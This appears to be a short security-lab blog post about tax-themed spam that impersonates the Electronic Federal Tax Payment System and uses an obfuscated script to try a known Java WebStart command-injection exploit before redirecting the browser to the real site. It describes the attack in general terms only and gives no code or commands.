Today we noticed some unusual looking messages claiming to be from the the Electronic Federal Tax Payment System (EFTPS). Spam with a tax theme always piques our curiosity, so we took a closer look.
De-obfuscating the script reveals code that attempts to exploit a known Java vulnerability (Java WebStart Arbitrary Command Line Injection).
Following the exploit attempt, the browser is redirected to the real EFTPS site to add a touch of realism:
This particular attack wasn’t successful on our test system, so we were unable to discern what the ultimate payload of the attack was. However, the attack is a prime illustration of cybercriminals’ willingness to target Java, a trend we noted in our last Security Labs Report. Like Flash, Java is ubiquitous, most people have it installed, yet many are unaware that it is there, let alone up to date.